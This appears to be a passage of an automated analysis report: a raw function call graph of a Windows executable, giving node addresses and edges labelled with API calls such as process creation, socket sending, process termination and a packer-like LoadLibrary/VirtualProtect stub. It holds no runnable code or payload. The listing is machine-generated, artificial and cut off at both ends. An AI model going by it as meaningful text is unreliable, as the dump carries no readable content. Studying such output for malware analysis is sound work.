90082->90137 90085 37cc6e 90083->90085 90086 37cca9 90083->90086 90084->90082 90115 35abf3 90084->90115 90133 33d6b4 48 API calls 90085->90133 90086->90082 90089 37ccb6 90086->90089 90088 37c964 90088->90082 90090 37c973 90088->90090 90135 33d6b4 48 API calls 90089->90135 90102 37c9a1 90090->90102 90119 35a8c8 90090->90119 90092 37cc87 90134 3697b6 89 API calls 90092->90134 90096 37ccd6 90136 36503c 91 API calls Mailbox 90096->90136 90098 37cadc VariantInit 90105 37cb11 _memset 90098->90105 90101 37ca4a 90101->90098 90103 37ca86 VariantClear 90101->90103 90102->90101 90129 35a25b 106 API calls 90102->90129 90103->90101 90104 37caa5 SysAllocString 90103->90104 90104->90101 90106 37cb8e 90105->90106 90107 37cbb4 90105->90107 90130 37c235 411 API calls Mailbox 90106->90130 90131 36a6f6 103 API calls 90107->90131 90110 37cbad 90111 37cc41 VariantClear 90110->90111 90112 37cc52 90111->90112 90112->90062 90113 37cbce 90113->90111 90132 36a6f6 103 API calls 90113->90132 90116 35ac16 90115->90116 90117 35ac04 __NMSG_WRITE 90115->90117 90116->90088 90117->90116 90138 323bcf 90117->90138 90120 35a8f2 90119->90120 90121 35a9ed SysFreeString 90120->90121 90122 35aa7e 90120->90122 90123 35a90a 90120->90123 90124 35a9f9 90120->90124 90121->90124 90122->90123 90122->90124 90125 35aad9 SysFreeString 90122->90125 90126 35aac9 lstrcmpiW 90122->90126 90123->90102 90124->90123 90142 35a78a RaiseException 90124->90142 90125->90122 90126->90125 90128 35aafa SysFreeString 90126->90128 90128->90124 90129->90102 90130->90110 90131->90113 90132->90113 90133->90092 90134->90112 90135->90096 90136->90112 90137->90112 90139 323bd9 __NMSG_WRITE 90138->90139 90140 34010a 48 API calls 90139->90140 90141 323bee _wcscpy 90140->90141 90141->90116 90142->90124 90144 32c4e7 90143->90144 90146 32c4da 90143->90146 90145 34010a 48 API calls 90144->90145 90145->90146 90146->90076 90147->89924 90148->89919 90150 39787b 90149->90150 90153 33406c 90149->90153 90324 36d520 86 API calls 4 library calls 90150->90324 90152 39788c 90325 36d520 86 API calls 4 library calls 90152->90325 90153->90152 90160 3340a6 _memmove 90153->90160 90155 334175 90161 334185 90155->90161 90323 37d21a 82 API calls Mailbox 90155->90323 90157 34010a 48 API calls 90157->90160 90158 3341f1 90158->89949 90159 32fa40 411 API calls 90159->90160 90160->90155 90160->90157 90160->90159 90160->90161 90162 3978d8 90160->90162 90161->89949 90326 36d520 86 API calls 4 library calls 90162->90326 90165 32d3d2 48 API calls 90164->90165 90166 38354a 90165->90166 90167 32d3d2 48 API calls 90166->90167 90168 383553 90167->90168 90169 32d3d2 48 API calls 90168->90169 90170 38355c 90169->90170 90171 3284a6 81 API calls 90170->90171 90180 3835e9 Mailbox 90170->90180 90172 383580 90171->90172 90327 383d7b 90172->90327 90180->89947 90253 3795e0 90252->90253 90253->89947 90412 3722e5 90254->90412 90256 371090 90256->89947 90258 32cdb4 48 API calls 90257->90258 90259 33f572 90258->90259 90260 3975d1 Sleep 90259->90260 90261 33f57a timeGetTime 90259->90261 90262 32cdb4 48 API calls 90261->90262 90263 33f590 90262->90263 90600 32e1f0 90263->90600 90267 3284a6 81 API calls 90266->90267 90268 36dcfc 90267->90268 90852 366d6d 90268->90852 90270 36dd06 90270->89947 90272 3284a6 81 API calls 90271->90272 90273 36eff2 90272->90273 90864 3678ad GetFullPathNameW 90273->90864 90278 36f04b CoInitialize CoCreateInstance 90280 36f070 90278->90280 90281 36f08e 90278->90281 90283 36f07a CoUninitialize 90280->90283 90282 3284a6 81 API calls 90281->90282 90284 36f09d 90282->90284 90303 36f23c Mailbox 90283->90303 90303->89947 90306 3250f6 90305->90306 90307 325105 90305->90307 90306->89947 90307->90306 90308 32510a CloseHandle 90307->90308 90308->90306 90310 32cdb4 48 API calls 90309->90310 90311 379515 90310->90311 90312 36be47 50 API calls 90311->90312 90313 379522 90312->90313 90314 37952f send 90313->90314 90315 379546 90314->90315 90316 379552 WSAGetLastError 90315->90316 90317 37956a 90315->90317 90316->90317 90317->89947 90319 3284a6 81 API calls 90318->90319 90320 376fd6 SetWindowTextW 90319->90320 90320->89947 90321->89946 90322->89947 90323->90158 90324->90152 90325->90161 90326->90161 90328 32c4cd 48 API calls 90327->90328 90329 383d89 90328->90329 90330 32c4cd 48 API calls 90329->90330 90331 383d91 90330->90331 90332 32c4cd 48 API calls 90331->90332 90413 372306 90412->90413 90414 372365 90413->90414 90415 37230a 90413->90415 90481 33f0f3 48 API calls 90414->90481 90416 34010a 48 API calls 90415->90416 90418 372311 90416->90418 90419 37231f 90418->90419 90468 325080 49 API calls 90418->90468 90421 3284a6 81 API calls 90419->90421 90423 372331 90421->90423 90422 372379 90424 37234d 90422->90424 90426 37243f 90422->90426 90429 3723bb 90422->90429 90469 324bf9 90423->90469 90424->90256 90427 36be47 50 API calls 90426->90427 90430 372446 90427->90430 90432 3284a6 81 API calls 90429->90432 90488 36689f SetFilePointerEx SetFilePointerEx WriteFile 90430->90488 90435 3723c2 90432->90435 90434 3723f6 90450 3667dc 90434->90450 90435->90434 90443 372400 90435->90443 90482 327b6e 90443->90482 90445 3250ec CloseHandle 90447 372490 90445->90447 90489 324592 CloseHandle 90447->90489 90448 3723fe Mailbox 90448->90424 90448->90445 90451 3667f6 90450->90451 90452 3667ec 90450->90452 90454 3667fc 90451->90454 90455 366808 90451->90455 90506 366917 SetFilePointerEx SetFilePointerEx WriteFile 90452->90506 90507 3668b9 51 API calls 90454->90507 90457 366824 90455->90457 90458 366811 90455->90458 90490 32a6d4 90457->90490 90460 32a6d4 48 API calls 90458->90460 90462 3667f4 Mailbox 90462->90448 90468->90419 90470 3250ec CloseHandle 90469->90470 90471 324c04 90470->90471 90546 324b88 90471->90546 90481->90422 90483 34010a 48 API calls 90482->90483 90484 327b93 90483->90484 90485 32a6f8 48 API calls 90484->90485 90486 327ba2 90485->90486 90488->90448 90489->90424 90506->90462 90507->90462 90547 324ba1 CreateFileW 90546->90547 90548 394957 90546->90548 90549 324bc3 90547->90549 90548->90549 90550 39495d CreateFileW 90548->90550 90550->90549 90601 32e216 90600->90601 90634 32e226 Mailbox 90600->90634 90602 32e670 90601->90602 90601->90634 90730 33ecee 411 API calls 90602->90730 90603 32e4e7 90605 32e4fd 90603->90605 90731 32322e 16 API calls 90603->90731 90605->89947 90607 32e681 90607->90605 90608 32e68e 90607->90608 90732 33ec33 411 API calls Mailbox 90608->90732 90609 32e26c PeekMessageW 90609->90634 90611 32e695 LockWindowUpdate DestroyWindow GetMessageW 90611->90605 90614 32e6c7 90611->90614 90612 395b13 Sleep 90612->90634 90617 33cf79 49 API calls 90617->90634 90619 32e657 PeekMessageW 90619->90634 90620 32e517 timeGetTime 90620->90634 90622 34010a 48 API calls 90622->90634 90623 32c935 48 API calls 90623->90634 90624 32e641 TranslateMessage DispatchMessageW 90624->90619 90625 395dfc WaitForSingleObject 90626 395e19 GetExitCodeProcess CloseHandle 90625->90626 90625->90634 90626->90634 90627 32d3d2 48 API calls 90637 395cce Mailbox 90627->90637 90628 396147 Sleep 90628->90637 90629 32e6cc timeGetTime 90733 33cf79 49 API calls 90629->90733 90630 395feb Sleep 90630->90634 90634->90603 90634->90609 90634->90612 90634->90617 90634->90619 90634->90620 90634->90622 90634->90623 90634->90624 90634->90625 90634->90628 90634->90629 90634->90630 90634->90637 90642 395cea Sleep 90634->90642 90645 321dce 107 API calls 90634->90645 90653 32fa40 387 API calls 90634->90653 90655 3344e0 387 API calls 90634->90655 90656 333680 387 API calls 90634->90656 90658 32d380 55 API calls 90634->90658 90659 36d520 86 API calls 90634->90659 90660 32caee 48 API calls 90634->90660 90661 321000 387 API calls 90634->90661 90662 32e7e0 90634->90662 90669 32ea00 90634->90669 90719 33f381 90634->90719 90724 33ed1a 90634->90724 90729 32e7b0 411 API calls Mailbox 90634->90729 90734 388b20 48 API calls 90634->90734 90742 33e3a5 timeGetTime 90634->90742 90636 3961de GetExitCodeProcess 90640 39620a CloseHandle 90636->90640 90641 3961f4 WaitForSingleObject 90636->90641 90637->90627 90637->90634 90637->90636 90637->90642 90643 395cd7 Sleep 90637->90643 90644 388a48 108 API calls 90637->90644 90647 396266 Sleep 90637->90647 90648 32caee 48 API calls 90637->90648 90735 3656dc 49 API calls Mailbox 90637->90735 90736 33cf79 49 API calls 90637->90736 90737 32d380 90637->90737 90741 321000 411 API calls 90637->90741 90743 37d12a 50 API calls 90637->90743 90744 368355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 90637->90744 90745 33e3a5 timeGetTime 90637->90745 90746 366f5b CreateToolhelp32Snapshot Process32FirstW 90637->90746 90640->90637 90641->90634 90641->90640 90642->90634 90643->90642 90644->90637 90645->90634 90647->90634 90648->90637 90653->90634 90655->90634 90656->90634 90658->90634 90659->90634 90660->90634 90661->90634 90663 32e80f 90662->90663 90664 32e7fd 90662->90664 90784 36d520 86 API calls 4 library calls 90663->90784 90753 32dcd0 90664->90753 90666 32e806 90666->90634 90668 3998e8 90668->90668 90670 32ea20 90669->90670 90671 32fa40 411 API calls 90670->90671 90673 32ea89 90670->90673 90674 399919 90671->90674 90672 3999bc 90799 36d520 86 API calls 4 library calls 90672->90799 90678 32d3d2 48 API calls 90673->90678 90700 32eb18 90673->90700 90702 32ecd7 Mailbox 90673->90702 90674->90673 90796 36d520 86 API calls 4 library calls 90674->90796 90676 32d3d2 48 API calls 90679 399997 90676->90679 90680 399963 90678->90680 90798 341b2a 52 API calls __cinit 90679->90798 90797 341b2a 52 API calls __cinit 90680->90797 90681 36d520 86 API calls 90681->90702 90683 399d70 90808 37e2fb 411 API calls Mailbox 90683->90808 90685 32d380 55 API calls 90685->90702 90687 399dc2 90810 36d520 86 API calls 4 library calls 90687->90810 90688 399ddf 90811 37c235 411 API calls Mailbox 90688->90811 90690 32fa40 411 API calls 90690->90702 90691 32342c 48 API calls 90691->90702 90692 399e49 90813 36d520 86 API calls 4 library calls 90692->90813 90694 3314a0 48 API calls 90694->90702 90699 399df7 90718 32ef0c Mailbox 90699->90718 90812 36d520 86 API calls 4 library calls 90699->90812 90700->90676 90700->90702 90702->90672 90702->90681 90702->90683 90702->90685 90702->90687 90702->90688 90702->90690 90702->90691 90702->90692 90702->90694 90703 32f56f 90702->90703 90706 399a3c 90702->90706 90702->90718 90792 32d805 90702->90792 90800 36a3ee 48 API calls 90702->90800 90801 37ede9 411 API calls 90702->90801 90806 35a599 InterlockedDecrement 90702->90806 90807 37f4df 411 API calls 90702->90807 90703->90718 90809 36d520 86 API calls 4 library calls 90703->90809 90802 37d154 48 API calls 90706->90802 90708 399a48 90711 399a9b 90708->90711 90718->90634 90720 39ee11 90719->90720 90721 33f390 90719->90721 90722 39ee46 90720->90722 90723 39ee28 TranslateAcceleratorW 90720->90723 90721->90634 90723->90721 90725 33ed2c 90724->90725 90726 33ed34 90724->90726 90725->90634 90726->90725 90727 33ed5e IsDialogMessageW 90726->90727 90728 39ebec GetClassLongW 90726->90728 90727->90725 90727->90726 90728->90726 90728->90727 90729->90634 90730->90603 90731->90607 90732->90611 90733->90634 90734->90634 90735->90637 90736->90637 90738 32d38b 90737->90738 90739 32d3b4 90738->90739 90814 32d772 55 API calls 90738->90814 90739->90637 90741->90637 90742->90634 90743->90637 90744->90637 90745->90637 90815 3679c2 90746->90815 90748 366fa4 Process32NextW 90749 367021 CloseHandle 90748->90749 90752 366fa0 _wcscat 90748->90752 90749->90637 90751 341bc7 _W_store_winword 59 API calls 90751->90752 90752->90748 90752->90749 90752->90751 90821 34297d 90752->90821 90754 32fa40 411 API calls 90753->90754 90768 32dd0f _memmove 90754->90768 90755 398dbe 90791 36d520 86 API calls 4 library calls 90755->90791 90758 32dd70 90758->90666 90759 32e12b Mailbox 90762 34010a 48 API calls 90759->90762 90760 34010a 48 API calls 90760->90768 90761 32e051 90763 32e066 90761->90763 90764 398daf 90761->90764 90774 32decb _memmove 90762->90774 90768->90755 90768->90758 90768->90759 90768->90760 90769 32deb7 90768->90769 90779 32df29 90768->90779 90769->90759 90771 32dec4 90769->90771 90773 34010a 48 API calls 90771->90773 90772 398d9e 90789 36d520 86 API calls 4 library calls 90772->90789 90773->90774 90774->90779 90777 32df64 90777->90666 90779->90761 90779->90772 90779->90777 90780 398d76 90779->90780 90782 398d51 90779->90782 90786 325322 411 API calls 90779->90786 90784->90668 90786->90779 90789->90777 90794 32d815 90792->90794 90795 32d828 _memmove 90792->90795 90793 34010a 48 API calls 90793->90795 90794->90793 90794->90795 90795->90702 90796->90673 90797->90700 90798->90702 90799->90718 90800->90702 90801->90702 90802->90708 90806->90702 90807->90702 90808->90703 90809->90718 90810->90718 90811->90699 90812->90718 90813->90718 90814->90739 90816 3679e9 90815->90816 90818 3679d0 90815->90818 90825 34224a 58 API calls __wcstoi64 90816->90825 90818->90816 90819 3679ef 90818->90819 90824 3422df GetStringTypeW wcstoxq 90818->90824 90819->90752 90826 3429c7 90821->90826 90824->90818 90825->90819 90853 366d8a __NMSG_WRITE 90852->90853 90854 366db3 GetFileAttributesW 90853->90854 90855 366dc5 GetLastError 90854->90855 90862 366de3 90854->90862 90856 366de7 90855->90856 90857 366dd0 CreateDirectoryW 90855->90857 90858 323bcf 48 API calls 90856->90858 90856->90862 90857->90856 90857->90862 90859 366df7 _wcsrchr 90858->90859 90860 366d6d 48 API calls 90859->90860 90859->90862 90861 366e1b 90860->90861 90861->90862 90863 366e28 CreateDirectoryW 90861->90863 90862->90270 90863->90862 90865 327e53 48 API calls 90864->90865 90866 3678df 90865->90866 90867 33e617 48 API calls 90866->90867 90868 3678eb 90867->90868 90869 37267a 90868->90869 90870 3726a4 __NMSG_WRITE 90869->90870 90871 36f039 90870->90871 90873 3726d8 90870->90873 90875 372763 90870->90875 90871->90278 90876 3239e8 48 API calls 2 library calls 90871->90876 90873->90871 90878 33dfd2 60 API calls 90873->90878 90875->90871 90879 33dfd2 60 API calls 90875->90879 90876->90278 90878->90873 90879->90875 90881 32a9af 90880->90881 90884 32a9ca 90880->90884 90882 32b8a7 48 API calls 90881->90882 90883 32a9b7 CharUpperBuffW 90882->90883 90883->90884 90884->89966 90886 394c5a 90885->90886 90887 3210f9 90885->90887 90888 34010a 48 API calls 90887->90888 90889 321100 90888->90889 90890 321121 90889->90890 90919 32113c 48 API calls 90889->90919 90890->89990 90892->89974 90893->90012 90894->90012 90895->90012 90896->90033 90897->89974 90899 32d30a 90898->90899 90900 32d2df 90898->90900 90899->89987 90899->89988 90903 32d2e6 90900->90903 90921 32d349 53 API calls 90900->90921 90903->90899 90920 32d349 53 API calls 90903->90920 90904->90030 90905->90018 90906->90018 90908->90030 90909->90000 90910->90030 90911->90030 90912->90030 90913->90012 90914->90012 90915->90012 90916->90030 90917->90007 90918->90030 90919->90890 90920->90899 90921->90903 90922->90049 90923->90049 90924->89468 90925->89468 90926->89468 90927->89468 90928->89468 90929->89463 90930->89451 90931->89441 90932->89437 90933->89445 90934->89454 90943 37ae3b 90935->90943 90938 37ad05 Mailbox 90939 37ad31 htons 90938->90939 90940 37ad1b 90938->90940 90939->90940 90940->89501 90942 36d7f2 90941->90942 90942->89508 90944 32a6d4 48 API calls 90943->90944 90945 37ae49 90944->90945 90948 37ae79 WideCharToMultiByte 90945->90948 90947 37acf3 inet_addr 90947->90938 90949 37aea7 90948->90949 90950 37ae9d 90948->90950 90952 34010a 48 API calls 90949->90952 90951 33f324 48 API calls 90950->90951 90955 37aea5 90951->90955 90953 37aeae WideCharToMultiByte 90952->90953 90954 33f2d0 48 API calls 90953->90954 90954->90955 90955->90947 90957 3823eb _memset 90956->90957 90958 382428 90957->90958 90959 382452 90957->90959 90960 32cdb4 48 API calls 90958->90960 90961 32cdb4 48 API calls 90959->90961 90965 382476 90959->90965 90962 382433 90960->90962 90964 382448 90961->90964 90962->90965 90967 32cdb4 48 API calls 90962->90967 90963 3824b0 90966 3284a6 81 API calls 90963->90966 90970 32cdb4 48 API calls 90964->90970 90965->90963 90968 32cdb4 48 API calls 90965->90968 90969 3824d4 90966->90969 90967->90964 90968->90963 90971 323bcf 48 API calls 90969->90971 90970->90965 90972 3824de 90971->90972 90973 3824e8 90972->90973 90974 3825a1 90972->90974 90976 3284a6 81 API calls 90973->90976 90975 3825d3 GetCurrentDirectoryW 90974->90975 90977 3284a6 81 API calls 90974->90977 90978 34010a 48 API calls 90975->90978 90979 3824f9 90976->90979 90980 3825b8 90977->90980 90981 3825f8 GetCurrentDirectoryW 90978->90981 90982 323bcf 48 API calls 90979->90982 90983 323bcf 48 API calls 90980->90983 90984 382605 90981->90984 90985 382503 90982->90985 90986 3825c2 __NMSG_WRITE 90983->90986 90989 32ca8e 48 API calls 90984->90989 90996 38263e 90984->90996 90987 3284a6 81 API calls 90985->90987 90986->90975 90986->90996 90988 382514 90987->90988 90990 323bcf 48 API calls 90988->90990 90991 38261e 90989->90991 90992 38251e 90990->90992 90993 32ca8e 48 API calls 90991->90993 90994 3284a6 81 API calls 90992->90994 90997 38262e 90993->90997 90998 38252f 90994->90998 90995 38268a 91000 38274c CreateProcessW 90995->91000 91001 3826c1 90995->91001 90996->90995 91034 36a17a 8 API calls 90996->91034 91002 32ca8e 48 API calls 90997->91002 91003 323bcf 48 API calls 90998->91003 91014 38276b 91000->91014 91037 35bc90 69 API calls 91001->91037 91002->90996 91006 382539 91003->91006 91004 382655 91035 36a073 8 API calls 91004->91035 91008 38256f GetSystemDirectoryW 91006->91008 91010 3284a6 81 API calls 91006->91010 91012 34010a 48 API calls 91008->91012 91009 382670 91036 36a102 8 API calls 91009->91036 91013 382550 91010->91013 91015 382594 GetSystemDirectoryW 91012->91015 91016 323bcf 48 API calls 91013->91016 91018 3827bd CloseHandle 91014->91018 91019 382780 91014->91019 91015->90984 91017 38255a __NMSG_WRITE 91016->91017 91017->90984 91017->91008 91020 3827cb 91018->91020 91028 3827f5 91018->91028 91023 382791 GetLastError 91019->91023 91038 369d09 CloseHandle Mailbox 91020->91038 91022 3827fb 91025 3827a5 91022->91025 91023->91025 91039 369b29 CloseHandle 91025->91039 91028->91022 91029 382827 CloseHandle 91028->91029 91029->91025 91030 381f2b 91030->89340 91033 3826df __NMSG_WRITE 91033->91014 91034->91004 91035->91009 91036->90995 91037->91033 91039->91030 91041 32d89e 50 API calls 91040->91041 91042 321a08 91041->91042 91043 321a12 91042->91043 91044 39db7d 91042->91044 91046 3284a6 81 API calls 91043->91046 91045 327e53 48 API calls 91044->91045 91047 39db8d 91045->91047 91048 321a1f 91046->91048 91047->91047 91049 32c935 48 API calls 91048->91049 91050 321a2d 91049->91050 91051 321dce 91050->91051 91052 321de4 Mailbox 91051->91052 91053 39db26 91052->91053 91057 321dfd 91052->91057 91054 39db2b IsWindow 91053->91054 91055 321e51 91054->91055 91056 39db3f 91054->91056 91055->89517 91055->89518 91141 32200a 91056->91141 91058 321e46 91057->91058 91059 3284a6 81 API calls 91057->91059 91058->91055 91063 39db65 IsWindow 91058->91063 91061 321e17 91059->91061 91088 321f04 91061->91088 91063->91055 91063->91056 91067 32c4cd 48 API calls 91066->91067 91068 35e2fe 91067->91068 91186 32193b SendMessageTimeoutW 91068->91186 91070 35e305 91081 35e309 Mailbox 91070->91081 91187 35e390 91070->91187 91073 34010a 48 API calls 91074 35e338 _strlen 91073->91074 91075 35e378 91074->91075 91076 35e35a 91074->91076 91074->91081 91077 327e53 48 API calls 91075->91077 91190 35e0f5 48 API calls 2 library calls 91076->91190 91077->91081 91079 35e362 91191 32c610 MultiByteToWideChar 91079->91191 91081->89523 91083 327c3a 91082->91083 91084 327bfb 91082->91084 91085 32c935 48 API calls 91083->91085 91086 34010a 48 API calls 91084->91086 91087 327c0e 91085->91087 91086->91087 91087->89525 91089 321f1a Mailbox 91088->91089 91090 32c935 48 API calls 91089->91090 91091 321f3e 91090->91091 91092 32c935 48 API calls 91091->91092 91093 321f49 91092->91093 91094 327e53 48 API calls 91093->91094 91095 321f59 91094->91095 91096 32d3d2 48 API calls 91095->91096 91097 321f87 91096->91097 91098 32d3d2 48 API calls 91097->91098 91099 321f90 91098->91099 91100 32d3d2 48 API calls 91099->91100 91101 321f99 91100->91101 91102 392569 91101->91102 91103 321fac 91101->91103 91151 35e4ea 60 API calls 3 library calls 91102->91151 91104 392583 91103->91104 91106 321fbe GetForegroundWindow 91103->91106 91142 322016 91141->91142 91143 34010a 48 API calls 91142->91143 91144 322023 91143->91144 91145 32197e 91144->91145 91146 321990 91145->91146 91150 3219af _memmove 91145->91150 91148 34010a 48 API calls 91146->91148 91147 34010a 48 API calls 91149 3219c6 91147->91149 91148->91150 91149->91055 91150->91147 91151->91104 91186->91070 91210 32193b SendMessageTimeoutW 91187->91210 91189 35e314 91189->91073 91190->91079 91210->91189 91212 367700 91211->91212 91222 3676f9 _wcsncpy 91211->91222 91213 34010a 48 API calls 91212->91213 91214 367706 GetFileVersionInfoW 91213->91214 91215 367722 __NMSG_WRITE 91214->91215 91216 34010a 48 API calls 91215->91216 91221 367739 _wcscat _wcscmp _wcscpy _wcsstr 91216->91221 91217 341bc7 _W_store_winword 59 API calls 91218 3677f7 91217->91218 91219 367827 75381560 91218->91219 91218->91222 91220 36783d _wcscmp 91219->91220 91219->91222 91220->91222 91226 34234b 80 API calls 3 library calls 91220->91226 91223 367779 75381560 91221->91223 91225 367793 _wcscat 91221->91225 91222->89533 91223->91225 91225->91217 91226->91222 91228 33f057 91227->91228 91229 33f069 91227->91229 91230 33f063 91228->91230 91231 33f05d 91228->91231 91232 32c4cd 48 API calls 91229->91232 91235 32a6d4 48 API calls 91230->91235 91234 32a6d4 48 API calls 91231->91234 91233 3664f5 91232->91233 91242 366524 91233->91242 91262 36649b ReadFile SetFilePointerEx 91233->91262 91263 32bd2f 48 API calls _memmove 91233->91263 91236 33f081 91234->91236 91237 36668b 91235->91237 91256 324c4f 91236->91256 91240 324c4f 50 API calls 91237->91240 91241 366699 91240->91241 91246 3666a9 Mailbox 91241->91246 91264 366765 50 API calls 91241->91264 91242->89573 91244 3949b2 91246->89573 91248 32c610 50 API calls 91249 33f0a3 Mailbox 91248->91249 91249->89573 91250->89551 91251->89578 91252->89547 91253->89552 91254->89569 91255->89575 91257 33f324 48 API calls 91256->91257 91258 324c60 91257->91258 91259 324ca0 2 API calls 91258->91259 91260 324c95 91258->91260 91265 324d29 91258->91265 91259->91258 91260->91244 91260->91248 91262->91233 91263->91233 91264->91246 91266 3945cf 91265->91266 91267 324d3d 91265->91267 91269 32a6f8 48 API calls 91266->91269 91274 324d67 91267->91274 91270 3945da 91269->91270 91272 34010a 48 API calls 91270->91272 91271 324d49 91271->91258 91273 3945ef _memmove 91272->91273 91275 324d7d 91274->91275 91278 324d78 _memmove 91274->91278 91276 394703 91275->91276 91277 34010a 48 API calls 91275->91277 91277->91278 91278->91271 91280 32816b 91279->91280 91281 3280f9 91279->91281 91282 32a2fb 48 API calls 91280->91282 91281->91280 91283 328105 91281->91283 91289 32813a _memmove 91282->91289 91284 328163 91283->91284 91285 328110 91283->91285 91314 327eda 48 API calls 91284->91314 91286 32a6f8 48 API calls 91285->91286 91288 32811a 91286->91288 91290 34010a 48 API calls 91288->91290 91289->89640 91290->91289 91292 323334 91291->91292 91294 323339 Mailbox 91291->91294 91315 32342c 48 API calls 91292->91315 91299 323347 91294->91299 91316 32346e 48 API calls 91294->91316 91296 34010a 48 API calls 91298 3233d8 91296->91298 91297 323422 91297->89631 91300 34010a 48 API calls 91298->91300 91299->91296 91299->91297 91301 3233e3 91300->91301 91301->89631 91302->89640 91304 34010a 48 API calls 91303->91304 91305 32818f 91304->91305 91305->89640 91306->89640 91307->89628 91308->89628 91309->89640 91310->89647 91311->89649 91312->89609 91313->89634 91314->91289 91315->91294 91316->91299 91317->89688 91319 33dd89 91318->91319 91320 394a7d FindFirstFileW 91318->91320 91319->89340 91321 394a8e 91320->91321 91322 394a95 FindClose 91320->91322 91321->91322 91324 3284a6 81 API calls 91323->91324 91325 37f7db 91324->91325 91348 37f81d Mailbox 91325->91348 91359 380458 91325->91359 91327 37fa7c 91328 37fbeb 91327->91328 91332 37fa86 91327->91332 91394 380579 89 API calls Mailbox 91328->91394 91331 37fbf8 91331->91332 91333 37fc04 91331->91333 91372 37f5fb 91332->91372 91333->91348 91334 3284a6 81 API calls 91344 37f875 Mailbox 91334->91344 91339 37faba 91386 33f92c 91339->91386 91342 37fad4 91392 36d520 86 API calls 4 library calls 91342->91392 91343 37faee 91345 323320 48 API calls 91343->91345 91344->91327 91344->91334 91344->91348 91390 3828d9 48 API calls _memmove 91344->91390 91391 37fc96 60 API calls 2 library calls 91344->91391 91349 37fb05 91345->91349 91347 37fadf GetCurrentProcess TerminateProcess 91347->91343 91348->89711 91350 3314a0 48 API calls 91349->91350 91358 37fb2f 91349->91358 91351 37fb1e 91350->91351 91393 380300 105 API calls _free 91351->91393 91353 3314a0 48 API calls 91353->91358 91354 37fc56 91354->91348 91355 37fc6f FreeLibrary 91354->91355 91355->91348 91357 32d89e 50 API calls 91357->91358 91358->91353 91358->91354 91358->91357 91395 380300 105 API calls _free 91358->91395 91360 32b8a7 48 API calls 91359->91360 91361 380473 CharLowerBuffW 91360->91361 91362 37267a 60 API calls 91361->91362 91363 380494 91362->91363 91365 32d3d2 48 API calls 91363->91365 91370 3804cf Mailbox 91363->91370 91366 3804ac 91365->91366 91367 327f40 48 API calls 91366->91367 91368 3804c3 91367->91368 91369 32a2fb 48 API calls 91368->91369 91369->91370 91371 38050b Mailbox 91370->91371 91396 37fc96 60 API calls 2 library calls 91370->91396 91371->91344 91373 37f616 91372->91373 91377 37f66b 91372->91377 91374 34010a 48 API calls 91373->91374 91375 37f638 91374->91375 91376 34010a 48 API calls 91375->91376 91375->91377 91376->91375 91378 380719 91377->91378 91379 380944 Mailbox 91378->91379 91385 38073c _strcat _wcscpy __NMSG_WRITE 91378->91385 91379->91339 91380 32d00b 58 API calls 91380->91385 91381 32cdb4 48 API calls 91381->91385 91382 3284a6 81 API calls 91382->91385 91383 3445ec 47 API calls __malloc_crt 91383->91385 91385->91379 91385->91380 91385->91381 91385->91382 91385->91383 91397 368932 50 API calls __NMSG_WRITE 91385->91397 91388 33f941 91386->91388 91387 33f9d9 select 91389 33f9a7 91387->91389 91388->91387 91388->91389 91389->91342 91389->91343 91390->91344 91391->91344 91392->91347 91393->91358 91394->91331 91395->91358 91396->91371 91397->91385 91399 376b25 GetWindowRect 91398->91399 91400 376b42 91398->91400 91401 376b5c 91399->91401 91400->91401 91402 376b52 ClientToScreen 91400->91402 91401->89715 91401->89719 91402->91401 91403->89721 91404->89725 91405->89733 91406->89745 91407->89755 91408->89756 91409->89777 91410->89779 91411->89787 91412->89806 91413->89822 91414->89822 91415->89833 91416->89825 91417->89822 91418->89824 91419->89855 91420->89869 91421 394ddc 91422 334472 91421->91422 91423 394de6 VariantClear 91421->91423 91423->91422 91424 48b0c0 91425 48b0d0 91424->91425 91426 48b1ea LoadLibraryA 91425->91426 91429 48b22f VirtualProtect VirtualProtect 91425->91429 91427 48b201 91426->91427 91427->91425 91431 48b213 GetProcAddress 91427->91431 91430 48b294 91429->91430 91430->91430 91431->91427 91432 48b229 ExitProcess 91431->91432 91433 331118 91434 33e016 50 API calls 91433->91434 91435 33112e 91434->91435 91436 39abeb 91435->91436 91437 331148 91435->91437 91503 33cf79 49 API calls 91436->91503 91439 333680 411 API calls 91437->91439 91479 32fad8 Mailbox _memmove 91439->91479 91441 39b628 Mailbox 91442 39ac2a 91444 39ac4a Mailbox 91442->91444 91504 36ba5d 48 API calls 91442->91504 91507 36d520 86 API calls 4 library calls 91444->91507 91445 330119 91510 36d520 86 API calls 4 library calls 91445->91510 91448 33105e 91454 32c935 48 API calls 91448->91454 91449 330dee 91456 32d89e 50 API calls 91449->91456 91450 34010a 48 API calls 91450->91479 91451 331063 91509 36d520 86 API calls 4 library calls 91451->91509 91452 32c935 48 API calls 91452->91479 91467 32fbf1 Mailbox 91454->91467 91455 330dfa 91459 32d89e 50 API calls 91455->91459 91456->91455 91457 39b772 91511 36d520 86 API calls 4 library calls 91457->91511 91462 330e83 91459->91462 91460 32f6d0 411 API calls 91460->91479 91461 35a599 InterlockedDecrement 91461->91479 91466 32caee 48 API calls 91462->91466 91464 32d3d2 48 API calls 91464->91479 91465 39b7d2 91475 3310f1 Mailbox 91466->91475 91468 341b2a 52 API calls __cinit 91468->91479 91470 331230 91470->91467 91508 36d520 86 API calls 4 library calls 91470->91508 91473 32fa40 411 API calls 91473->91479 91506 36d520 86 API calls 4 library calls 91475->91506 91477 39b583 91505 36d520 86 API calls 4 library calls 91477->91505 91479->91445 91479->91448 91479->91449 91479->91450 91479->91451 91479->91452 91479->91455 91479->91457 91479->91460 91479->91461 91479->91462 91479->91464 91479->91467 91479->91468 91479->91470 91479->91473 91479->91475 91479->91477 91480 381f19 132 API calls 91479->91480 91481 380bfa 129 API calls 91479->91481 91482 37013f 87 API calls 91479->91482 91483 33f03e 2 API calls 91479->91483 91484 3250a3 49 API calls 91479->91484 91485 3817aa 87 API calls 91479->91485 91486 378065 55 API calls 91479->91486 91487 33f461 98 API calls 91479->91487 91488 3281c6 85 API calls 91479->91488 91489 379122 91 API calls 91479->91489 91490 38798d 109 API calls 91479->91490 91491 3830ad 93 API calls 91479->91491 91492 38804e 111 API calls 91479->91492 91493 3792c0 88 API calls 91479->91493 91494 33dd84 3 API calls 91479->91494 91495 37b74b 411 API calls 91479->91495 91496 3810e5 82 API calls 91479->91496 91497 33ef0d 94 API calls 91479->91497 91498 331620 59 API calls Mailbox 91479->91498 91499 37ee52 82 API calls 2 library calls 91479->91499 91500 37ef9d 90 API calls Mailbox 91479->91500 91501 